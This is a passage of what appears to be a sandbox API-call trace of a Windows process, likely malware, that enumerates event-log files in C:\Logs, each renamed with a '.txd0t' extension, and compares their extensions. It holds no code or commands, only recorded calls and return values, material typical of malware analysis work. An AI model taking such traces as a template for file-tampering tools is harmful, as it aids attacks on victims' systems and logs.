cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.938] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Store%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.txd0t" [0128.938] PathFindExtensionW (pszPath="Microsoft-Windows-Store%4Operational.evtx.txd0t") returned=".txd0t" [0128.938] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.938] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a65bbe9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", cAlternateFileName="MID312~1.TXD")) returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", psz2=".") returned 1 [0128.938] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", psz2="..") returned 1 [0128.938] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.938] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.938] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t" [0128.938] PathFindExtensionW (pszPath="Microsoft-Windows-TaskScheduler%4Maintenance.evtx.txd0t") returned=".txd0t" [0128.938] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.939] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a681f5a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", cAlternateFileName="MIE05F~1.TXD")) returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.939] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.939] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.939] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t" [0128.939] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.txd0t") returned=".txd0t" [0128.939] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.939] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a8259fd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", cAlternateFileName="MIC83D~1.TXD")) returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.939] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.939] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.939] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t" [0128.939] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.txd0t") returned=".txd0t" [0128.939] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.939] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6a80d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", cAlternateFileName="MI9DD8~1.TXD")) returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.939] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.939] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.939] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t" [0128.939] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.txd0t") returned=".txd0t" [0128.939] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.939] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6a80d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", cAlternateFileName="MI7D3C~1.TXD")) returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.939] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.939] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.939] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t" [0128.939] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.txd0t") returned=".txd0t" [0128.939] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.939] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6ce347, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", cAlternateFileName="MI7044~1.TXD")) returned 1 [0128.939] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.940] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.940] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.940] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.txd0t" [0128.940] PathFindExtensionW (pszPath="Microsoft-Windows-TWinUI%4Operational.evtx.txd0t") returned=".txd0t" [0128.940] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.940] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a6f458b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", cAlternateFileName="MIB0A2~1.TXD")) returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.940] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.940] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.940] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t" [0128.940] PathFindExtensionW (pszPath="Microsoft-Windows-User Profile Service%4Operational.evtx.txd0t") returned=".txd0t" [0128.940] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.940] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a71a93d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", cAlternateFileName="MIFBDF~1.TXD")) returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", psz2=".") returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", psz2="..") returned 1 [0128.940] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.940] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.940] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t" [0128.940] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4ActionCenter.evtx.txd0t") returned=".txd0t" [0128.940] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.940] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a740b53, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", cAlternateFileName="MIF620~1.TXD")) returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", psz2=".") returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", psz2="..") returned 1 [0128.940] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.940] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.940] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t" [0128.940] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t") returned=".txd0t" [0128.940] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.940] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a740b53, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", cAlternateFileName="MIAC2C~1.TXD")) returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.940] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.940] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.940] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.941] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t" [0128.941] PathFindExtensionW (pszPath="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t") returned=".txd0t" [0128.941] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.941] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a871d72, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", cAlternateFileName="MI97D5~1.TXD")) returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.941] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.941] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.941] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t" [0128.941] PathFindExtensionW (pszPath="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t") returned=".txd0t" [0128.941] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.941] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a78cf09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", cAlternateFileName="MI84B2~1.TXD")) returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.941] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.941] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.941] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t" [0128.941] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t") returned=".txd0t" [0128.941] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.941] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a78cf09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", cAlternateFileName="MI6769~1.TXD")) returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", psz2=".") returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", psz2="..") returned 1 [0128.941] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.941] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.941] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t" [0128.941] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t") returned=".txd0t" [0128.941] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.941] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a8259fd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", cAlternateFileName="MI7EF2~1.TXD")) returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", psz2=".") returned 1 [0128.941] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", psz2="..") returned 1 [0128.941] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.941] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.941] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t" [0128.942] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t") returned=".txd0t" [0128.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.942] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5abdf31c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", cAlternateFileName="MI58B6~1.TXD")) returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", psz2=".") returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", psz2="..") returned 1 [0128.942] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.942] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.942] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t" [0128.942] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t") returned=".txd0t" [0128.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.942] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5abdf31c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", cAlternateFileName="MIA157~1.TXD")) returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", psz2=".") returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", psz2="..") returned 1 [0128.942] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.942] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.942] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t" [0128.942] PathFindExtensionW (pszPath="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t") returned=".txd0t" [0128.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.942] 